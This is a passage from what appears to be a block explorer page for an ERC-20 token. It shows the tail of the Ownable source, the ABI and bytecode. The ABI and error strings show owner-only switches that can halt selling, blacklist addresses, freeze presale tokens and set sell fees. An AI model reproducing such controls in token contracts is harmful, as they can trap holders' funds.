     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"blacklist","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"burnFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"feeWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"limitOn","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxHoldingAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"presaleBalancesStore","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"presaleHolderLock","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"requiredToken","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_requiredToken","type":"address"}],"name":"requiredTokenAddress","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"requiredTokenAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"requiredTokenRuleOn","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellingOn","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_maxHoldingAmount","type":"uint256"},{"internalType":"uint256","name":"_requiredTokenAmount","type":"uint256"}],"name":"setAmmounts","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"},{"internalType":"bool","name":"_isBlacklisted","type":"bool"}],"name":"setBlacklist","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"_tradingOn","type":"bool"},{"internalType":"bool","name":"_sellingOn","type":"bool"},{"internalType":"bool","name":"_limitOn","type":"bool"},{"internalType":"bool","name":"_transferTaxOn","type":"bool"},{"internalType":"bool","name":"_requiredTokenRuleOn","type":"bool"}],"name":"setBools","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_burnFee","type":"uint256"}],"name":"setBurn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_sellFee","type":"uint256"},{"internalType":"address","name":"_feeWallet","type":"address"}],"name":"setFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"_presaleHolderLock","type":"bool"}],"name":"setPresaleHolderLock","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingOn","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"transferTaxOn","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"}]

6080604052600880547796606d22ada1ba55bb2eede8341b33b9658f8405010000016001600160c01b031990911617905560026009819055600a55600c80546001600160a01b03191673c7a2572fa8fdb0f7e81d6d3c4e3ccf78fb0dc374179055600e805460ff1990811690915560108054909116600117905534801562000085575f80fd5b506040518060400160405280600f81526020016e0536368697a6f206f66205073796f7608c1b815250604051806040016040528060078152602001660534348495a4f560cc1b8152508160039081620000df9190620010df565b506004620000ee8282620010df565b5050506200010b6200010562000b3c60201b60201c565b62000b40565b60408051601080825261022082019092526bb1b6ef0655cb8d15d8000000915f91906020820161020080368337019050509050731e94071a3f3c292bc0b11f9f5c0520cc093d041f815f81518110620001685762000168620011a7565b60200260200101906001600160a01b031690816001600160a01b0316815250507348ecc378a1025ba8469bb697751bfc7a1e0d380081600181518110620001b357620001b3620011a7565b60200260200101906001600160a01b031690816001600160a01b03168152505073bdfda70cac82719ae23bee862e19929f46374cba81600281518110620001fe57620001fe620011a7565b60200260200101906001600160a01b031690816001600160a01b03168152505073c8eef0e794386a52377a1737fac24fca40be922081600381518110620002495762000249620011a7565b60200260200101906001600160a01b031690816001600160a01b03168152505073f193507522c1d79f59c818df36e40ce64ca747c681600481518110620002945762000294620011a7565b60200260200101906001600160a01b031690816001600160a01b03168152505073b3d6140b4fc5d20d19c55e1eab2ec8d1ac2d8d2a81600581518110620002df57620002df620011a7565b60200260200101906001600160a01b031690816001600160a01b031681525050735e07b97b2b82a8f9f3a23e2ee0bf5e315c4221e0816006815181106200032a576200032a620011a7565b60200260200101906001600160a01b031690816001600160a01b0316815250507353748a25d3c0192be92af0249ac399108b90928181600781518110620003755762000375620011a7565b60200260200101906001600160a01b031690816001600160a01b031681525050739b9001a6c65a27e995418e8dbac2cc0b3f8f9d3781600881518110620003c057620003c0620011a7565b60200260200101906001600160a01b031690816001600160a01b03168152505073c2368874f8a6fdbef66879182b24e1f8f0c4505a816009815181106200040b576200040b620011a7565b60200260200101906001600160a01b031690816001600160a01b031681525050735d6db18cff0a54f89383be804f921218d8e77f8881600a81518110620004565762000456620011a7565b60200260200101906001600160a01b031690816001600160a01b0316815250507384e4f5db2e9f454e0e3cb22e72033d333b4ec34281600b81518110620004a157620004a1620011a7565b60200260200101906001600160a01b031690816001600160a01b031681525050732d971977feb62637493f7519a4e4d8f37431c56581600c81518110620004ec57620004ec620011a7565b60200260200101906001600160a01b031690816001600160a01b03168152505073b05770f7bd0cf011699a18ff5020c204b551f5a181600d81518110620005375762000537620011a7565b60200260200101906001600160a01b031690816001600160a01b03168152505073c76e479c364a7ba3a4ed1cf9bb5b52fe352492b881600e81518110620005825762000582620011a7565b60200260200101906001600160a01b031690816001600160a01b03168152505073dd75c62867ed17cead562388a7d101a10fca3f0d81600f81518110620005cd57620005cd620011a7565b6001600160a01b039290921660209283029190910182015260408051601080825261022082019092525f929091908201610200803683370190505090506a2bed86ec6d8a3d93f00000815f815181106200062b576200062b620011a7565b6020026020010181815250506a58c1a8a7c74b332e80000081600181518110620006595762000659620011a7565b6020026020010181815250506a299c9a9e90e60a9df0000081600281518110620006875762000687620011a7565b6020026020010181815250506a12f1cb0344ba7d2d10000081600381518110620006b557620006b5620011a7565b6020026020010181815250506a89fd15e6862457c140000081600481518110620006e357620006e3620011a7565b6020026020010181815250506a158259745dd973f5e0000081600581518110620007115762000711620011a7565b6020026020010181815250506a291d8c8de19e48d6f00000816006815181106200073f576200073f620011a7565b6020026020010181815250506a4cd8571758910886800000816007815181106200076d576200076d620011a7565b6020026020010181815250506a0219e33490f2d18d580000816008815181106200079b576200079b620011a7565b6020026020010181815250506a1459e34d6f875a7ae0000081600981518110620007c957620007c9620011a7565b6020026020010181815250506a12dcb91b61b01525e0000081600a81518110620007f757620007f7620011a7565b6020026020010181815250506a32a1161e5a579e6060000081600b81518110620008255762000825620011a7565b6020026020010181815250506a494be5b9a6832bd140000081600c81518110620008535762000853620011a7565b6020026020010181815250506a0782f9ff152ff619a0000081600d81518110620008815762000881620011a7565b6020026020010181815250506a0364508ce7ebe469d0000081600e81518110620008af57620008af620011a7565b6020026020010181815250506a1787357cd910d0f360000081600f81518110620008dd57620008dd620011a7565b6020026020010181815250505f5b8251811015620009e1576200093f8382815181106200090e576200090e620011a7565b60200260200101518383815181106200092b576200092b620011a7565b602002602001015162000b9160201b60201c565b818181518110620009545762000954620011a7565b602002602001015184620009699190620011cf565b9350818181518110620009805762000980620011a7565b6020026020010151600f5f858481518110620009a057620009a0620011a7565b60200260200101516001600160a01b03166001600160a01b031681526020019081526020015f20819055508080620009d890620011eb565b915050620008eb565b5082620009ef338262000b91565b620009fc60648562001206565b6007556a09195731e2ce35eb000000600d556040805163c45a015560e01b81529051737a250d5630b4cf539739df2c5dacb4c659f2488d9173c02aaa39b223fe8d0a0e5c4f27ead9083c756cc291839163c45a01559160048083019260209291908290030181865afa15801562000a75573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019062000a9b919062001226565b6040516364e329cb60e11b81526001600160a01b038381166004830152306024830152919091169063c9c65396906044016020604051808303815f875af115801562000ae9573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019062000b0f919062001226565b600680546001600160a01b0319166001600160a01b03929092169190911790555062001283945050505050565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a35050565b6001600160a01b03821662000bed5760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f20616464726573730060448201526064015b60405180910390fd5b62000bfa5f838362000c63565b8060025f82825462000c0d919062001255565b90915550506001600160a01b0382165f81815260208181526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b6001600160a01b0382165f908152600b602052604090205460ff1615801562000ca457506001600160a01b0383165f908152600b602052604090205460ff16155b62000ce05760405162461bcd60e51b815260206004820152600b60248201526a109b1858dadb1a5cdd195960aa1b604482015260640162000be4565b60085460ff1662000d68576005546001600160a01b038481169116148062000d1557506005546001600160a01b038381169116145b62000d635760405162461bcd60e51b815260206004820152601360248201527f54726164696e67206e6f7420656e61626c656400000000000000000000000000604482015260640162000be4565b505050565b600854610100900460ff168062000d8d57506006546001600160a01b03838116911614155b62000ddb5760405162461bcd60e51b815260206004820152601360248201527f53656c6c696e67206e6f7420656e61626c656400000000000000000000000000604482015260640162000be4565b60085462010000900460ff16801562000e0157506006546001600160a01b038481169116145b1562000e86576007548162000e2a846001600160a01b03165f9081526020819052604090205490565b62000e36919062001255565b111562000e865760405162461bcd60e51b815260206004820152601b60248201527f4d617820686f6c64696e6720616d6f756e742065786365656465640000000000604482015260640162000be4565b600e5460ff16801562000ea657506006546001600160a01b038381169116145b1562000f8557600d54600c546040516370a0823160e01b81526001600160a01b038681166004830152909116906370a0823190602401602060405180830381865afa15801562000ef8573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019062000f1e91906200126b565b101562000f855760405162461bcd60e51b815260206004820152602e60248201527f496e73756666696369656e742046696e616c652062616c616e636520696e207760448201526d30b63632ba103a379039b2b6361760911b606482015260840162000be4565b60105460ff16801562000fae57506001600160a01b0383165f908152600f602052604090205415155b1562000d63576001600160a01b0383165f908152600f6020908152604080832054918390529091205462000fe4908390620011cf565b101562000d635760405162461bcd60e51b8152602060048201526024808201527f50726573616c6520746f6b656e73206172652063757272656e746c792066726f6044820152633d32b71760e11b606482015260840162000be4565b634e487b7160e01b5f52604160045260245ffd5b600181811c908216806200106957607f821691505b6020821081036200108857634e487b7160e01b5f52602260045260245ffd5b50919050565b601f82111562000d63575f81815260208120601f850160051c81016020861015620010b65750805b601f850160051c820191505b81811015620010d757828155600101620010c2565b505050505050565b81516001600160401b03811115620010fb57620010fb62001040565b62001113816200110c845462001054565b846200108e565b602080601f83116001811462001149575f8415620011315750858301515b5f19600386901b1c1916600185901b178555620010d7565b5f85815260208120601f198616915b82811015620011795788860151825594840194600190910190840162001158565b50858210156200119757878501515f19600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b5f52603260045260245ffd5b634e487b7160e01b5f52601160045260245ffd5b81810381811115620011e557620011e5620011bb565b92915050565b5f60018201620011ff57620011ff620011bb565b5060010190565b5f826200122157634e487b7160e01b5f52601260045260245ffd5b500490565b5f6020828403121562001237575f80fd5b81516001600160a01b03811681146200124e575f80fd5b9392505050565b80820180821115620011e557620011e5620011bb565b5f602082840312156200127c575f80fd5b5051919050565b61153580620012915f395ff3fe608060405234801561000f575f80fd5b506004361061021e575f3560e01c806389f9a1d31161012a578063b4f2e8b8116100b4578063f2fde38b11610079578063f2fde38b14610498578063f9f92be4146104ab578063fb4b0d68146104cd578063fce589d8146104e1578063fd1bc2ca146104ea575f80fd5b8063b4f2e8b814610438578063dd62ed3e1461044b578063e402aa581461045e578063efe8e7b514610470578063f25f4b561461047d575f80fd5b80639985ad83116100fa5780639985ad83146103d9578063a3c0a173146103ec578063a457c2d7146103ff578063a8aa1b3114610412578063a9059cbb14610425575f80fd5b806389f9a1d31461038c5780638a204ed6146103955780638da5cb5b146103c057806395d89b41146103d1575f80fd5b806339509351116101ab5780634a2bf86f1161017b5780634a2bf86f1461032357806366c4b7821461033657806370a0823114610349578063715018a61461037157806371f4823414610379575f80fd5b806339509351146102dd57806342966c68146102f057806346742770146103035780634a13dfe714610310575f80fd5b806323b872dd116101f157806323b872dd1461028a5780632575e0041461029d57806329d428ca146102bc5780632b14ca56146102c5578063313ce567146102ce575f80fd5b806306fdde0314610222578063095ea7b314610240578063153b0d1e1461026357806318160ddd14610278575b5f80fd5b61022a6104f7565b604051610237919061121f565b60405180910390f35b61025361024e366004611285565b610587565b6040519015158152602001610237565b6102766102713660046112bc565b6105a0565b005b6002545b604051908152602001610237565b6102536102983660046112ed565b6105d2565b61027c6102ab366004611326565b600f6020525f908152604090205481565b61027c600d5481565b61027c60095481565b60405160128152602001610237565b6102536102eb366004611285565b6105f5565b6102766102fe366004611346565b610616565b6010546102539060ff1681565b61027661031e36600461135d565b610623565b610276610331366004611326565b61068e565b610276610344366004611346565b6106b8565b61027c610357366004611326565b6001600160a01b03165f9081526020819052604090205490565b6102766106c5565b6008546102539062010000900460ff1681565b61027c60075481565b600c546103a8906001600160a01b031681565b6040516001600160a01b039091168152602001610237565b6005546001600160a01b03166103a8565b61022a6106d8565b6102766103e73660046113be565b6106e7565b6102766103fa3660046113d7565b610702565b61025361040d366004611285565b610715565b6006546103a8906001600160a01b031681565b610253610433366004611285565b610794565b6102766104463660046113f7565b6107a1565b61027c610459366004611418565b6107dd565b60085461025390610100900460ff1681565b600e546102539060ff1681565b6008546103a89064010000000090046001600160a01b031681565b6102766104a6366004611326565b610807565b6102536104b9366004611326565b600b6020525f908152604090205460ff1681565b600854610253906301000000900460ff1681565b61027c600a5481565b6008546102539060ff1681565b60606003805461050690611440565b80601f016020809104026020016040519081016040528092919081815260200182805461053290611440565b801561057d5780601f106105545761010080835404028352916020019161057d565b820191905f5260205f20905b81548152906001019060200180831161056057829003601f168201915b5050505050905090565b5f3361059481858561087d565b60019150505b92915050565b6105a86109a0565b6001600160a01b03919091165f908152600b60205260409020805460ff1916911515919091179055565b5f336105df8582856109fa565b6105ea858585610a72565b506001949350505050565b5f3361059481858561060783836107dd565b610611919061148c565b61087d565b6106203382610b40565b50565b61062b6109a0565b6008805461ffff191695151561ff00191695909517610100941515949094029390931763ffff00001916620100009215159290920263ff00000019169190911763010000009115159190910217909155600e805460ff1916911515919091179055565b6106966109a0565b600c80546001600160a01b0319166001600160a01b0392909216919091179055565b6106c06109a0565b600a55565b6106cd6109a0565b6106d65f610c7b565b565b60606004805461050690611440565b6106ef6109a0565b6010805460ff1916911515919091179055565b61070a6109a0565b600791909155600d55565b5f338161072282866107dd565b9050838110156107875760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b6105ea828686840361087d565b5f33610594818585610a72565b6107a96109a0565b600991909155600880546001600160a01b0390921664010000000002640100000000600160c01b0319909216919091179055565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b61080f6109a0565b6001600160a01b0381166108745760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161077e565b61062081610c7b565b6001600160a01b0383166108df5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161077e565b6001600160a01b0382166109405760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161077e565b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6005546001600160a01b031633146106d65760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640161077e565b5f610a0584846107dd565b90505f198114610a6c5781811015610a5f5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604482015260640161077e565b610a6c848484840361087d565b50505050565b6008546301000000900460ff168015610a9957506006546001600160a01b03838116911614155b15610b30575f606460095483610aaf919061149f565b610ab991906114b6565b90505f6064600a5484610acc919061149f565b610ad691906114b6565b90505f610ae383856114d5565b90505f610af083836114d5565b9050610b1287600860049054906101000a90046001600160a01b031686610ccc565b610b1c8784610b40565b610b27878783610ccc565b50505050505050565b610b3b838383610ccc565b505050565b6001600160a01b038216610ba05760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f206164647265736044820152607360f81b606482015260840161077e565b610bab825f83610e79565b6001600160a01b0382165f9081526020819052604090205481811015610c1e5760405162461bcd60e51b815260206004820152602260248201527f45524332303a206275726e20616d6f756e7420657863656564732062616c616e604482015261636560f01b606482015260840161077e565b6001600160a01b0383165f818152602081815260408083208686039055600280548790039055518581529192917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3505050565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a35050565b6001600160a01b038316610d305760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161077e565b6001600160a01b038216610d925760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161077e565b610d9d838383610e79565b6001600160a01b0383165f9081526020819052604090205481811015610e145760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b606482015260840161077e565b6001600160a01b038481165f81815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3610a6c565b6001600160a01b0382165f908152600b602052604090205460ff16158015610eb957506001600160a01b0383165f908152600b602052604090205460ff16155b610ef35760405162461bcd60e51b815260206004820152600b60248201526a109b1858dadb1a5cdd195960aa1b604482015260640161077e565b60085460ff16610f68576005546001600160a01b0384811691161480610f2657506005546001600160a01b038381169116145b610b3b5760405162461bcd60e51b8152602060048201526013602482015272151c98591a5b99c81b9bdd08195b98589b1959606a1b604482015260640161077e565b600854610100900460ff1680610f8c57506006546001600160a01b03838116911614155b610fce5760405162461bcd60e51b815260206004820152601360248201527214d95b1b1a5b99c81b9bdd08195b98589b1959606a1b604482015260640161077e565b60085462010000900460ff168015610ff357506006546001600160a01b038481169116145b15611072576007548161101a846001600160a01b03165f9081526020819052604090205490565b611024919061148c565b11156110725760405162461bcd60e51b815260206004820152601b60248201527f4d617820686f6c64696e6720616d6f756e742065786365656465640000000000604482015260640161077e565b600e5460ff16801561109157506006546001600160a01b038381169116145b1561116a57600d54600c546040516370a0823160e01b81526001600160a01b038681166004830152909116906370a0823190602401602060405180830381865afa1580156110e1573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061110591906114e8565b101561116a5760405162461bcd60e51b815260206004820152602e60248201527f496e73756666696369656e742046696e616c652062616c616e636520696e207760448201526d30b63632ba103a379039b2b6361760911b606482015260840161077e565b60105460ff16801561119257506001600160a01b0383165f908152600f602052604090205415155b15610b3b576001600160a01b0383165f908152600f602090815260408083205491839052909120546111c59083906114d5565b1015610b3b5760405162461bcd60e51b8152602060048201526024808201527f50726573616c6520746f6b656e73206172652063757272656e746c792066726f6044820152633d32b71760e11b606482015260840161077e565b5f6020808352835180828501525f5b8181101561124a5785810183015185820160400152820161122e565b505f604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114611280575f80fd5b919050565b5f8060408385031215611296575f80fd5b61129f8361126a565b946020939093013593505050565b80358015158114611280575f80fd5b5f80604083850312156112cd575f80fd5b6112d68361126a565b91506112e4602084016112ad565b90509250929050565b5f805f606084860312156112ff575f80fd5b6113088461126a565b92506113166020850161126a565b9150604084013590509250925092565b5f60208284031215611336575f80fd5b61133f8261126a565b9392505050565b5f60208284031215611356575f80fd5b5035919050565b5f805f805f60a08688031215611371575f80fd5b61137a866112ad565b9450611388602087016112ad565b9350611396604087016112ad565b92506113a4606087016112ad565b91506113b2608087016112ad565b90509295509295909350565b5f602082840312156113ce575f80fd5b61133f826112ad565b5f80604083850312156113e8575f80fd5b50508035926020909101359150565b5f8060408385031215611408575f80fd5b823591506112e46020840161126a565b5f8060408385031215611429575f80fd5b6114328361126a565b91506112e46020840161126a565b600181811c9082168061145457607f821691505b60208210810361147257634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b8082018082111561059a5761059a611478565b808202811582820484141761059a5761059a611478565b5f826114d057634e487b7160e01b5f52601260045260245ffd5b500490565b8181038181111561059a5761059a611478565b5f602082840312156114f8575f80fd5b505191905056fea2646970667358221220acce4b68fa06e50f63034e43ad0bfa6848d4cf759c46141d671d1341bade6b5464736f6c63430008150033

Deployed Bytecode

0x608060405234801561000f575f80fd5b506004361061021e575f3560e01c806389f9a1d31161012a578063b4f2e8b8116100b4578063f2fde38b11610079578063f2fde38b14610498578063f9f92be4146104ab578063fb4b0d68146104cd578063fce589d8146104e1578063fd1bc2ca146104ea575f80fd5b8063b4f2e8b814610438578063dd62ed3e1461044b578063e402aa581461045e578063efe8e7b514610470578063f25f4b561461047d575f80fd5b80639985ad83116100fa5780639985ad83146103d9578063a3c0a173146103ec578063a457c2d7146103ff578063a8aa1b3114610412578063a9059cbb14610425575f80fd5b806389f9a1d31461038c5780638a204ed6146103955780638da5cb5b146103c057806395d89b41146103d1575f80fd5b806339509351116101ab5780634a2bf86f1161017b5780634a2bf86f1461032357806366c4b7821461033657806370a0823114610349578063715018a61461037157806371f4823414610379575f80fd5b806339509351146102dd57806342966c68146102f057806346742770146103035780634a13dfe714610310575f80fd5b806323b872dd116101f157806323b872dd1461028a5780632575e0041461029d57806329d428ca146102bc5780632b14ca56146102c5578063313ce567146102ce575f80fd5b806306fdde0314610222578063095ea7b314610240578063153b0d1e1461026357806318160ddd14610278575b5f80fd5b61022a6104f7565b604051610237919061121f565b60405180910390f35b61025361024e366004611285565b610587565b6040519015158152602001610237565b6102766102713660046112bc565b6105a0565b005b6002545b604051908152602001610237565b6102536102983660046112ed565b6105d2565b61027c6102ab366004611326565b600f6020525f908152604090205481565b61027c600d5481565b61027c60095481565b60405160128152602001610237565b6102536102eb366004611285565b6105f5565b6102766102fe366004611346565b610616565b6010546102539060ff1681565b61027661031e36600461135d565b610623565b610276610331366004611326565b61068e565b610276610344366004611346565b6106b8565b61027c610357366004611326565b6001600160a01b03165f9081526020819052604090205490565b6102766106c5565b6008546102539062010000900460ff1681565b61027c60075481565b600c546103a8906001600160a01b031681565b6040516001600160a01b039091168152602001610237565b6005546001600160a01b03166103a8565b61022a6106d8565b6102766103e73660046113be565b6106e7565b6102766103fa3660046113d7565b610702565b61025361040d366004611285565b610715565b6006546103a8906001600160a01b031681565b610253610433366004611285565b610794565b6102766104463660046113f7565b6107a1565b61027c610459366004611418565b6107dd565b60085461025390610100900460ff1681565b600e546102539060ff1681565b6008546103a89064010000000090046001600160a01b031681565b6102766104a6366004611326565b610807565b6102536104b9366004611326565b600b6020525f908152604090205460ff1681565b600854610253906301000000900460ff1681565b61027c600a5481565b6008546102539060ff1681565b60606003805461050690611440565b80601f016020809104026020016040519081016040528092919081815260200182805461053290611440565b801561057d5780601f106105545761010080835404028352916020019161057d565b820191905f5260205f20905b81548152906001019060200180831161056057829003601f168201915b5050505050905090565b5f3361059481858561087d565b60019150505b92915050565b6105a86109a0565b6001600160a01b03919091165f908152600b60205260409020805460ff1916911515919091179055565b5f336105df8582856109fa565b6105ea858585610a72565b506001949350505050565b5f3361059481858561060783836107dd565b610611919061148c565b61087d565b6106203382610b40565b50565b61062b6109a0565b6008805461ffff191695151561ff00191695909517610100941515949094029390931763ffff00001916620100009215159290920263ff00000019169190911763010000009115159190910217909155600e805460ff1916911515919091179055565b6106966109a0565b600c80546001600160a01b0319166001600160a01b0392909216919091179055565b6106c06109a0565b600a55565b6106cd6109a0565b6106d65f610c7b565b565b60606004805461050690611440565b6106ef6109a0565b6010805460ff1916911515919091179055565b61070a6109a0565b600791909155600d55565b5f338161072282866107dd565b9050838110156107875760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b6105ea828686840361087d565b5f33610594818585610a72565b6107a96109a0565b600991909155600880546001600160a01b0390921664010000000002640100000000600160c01b0319909216919091179055565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b61080f6109a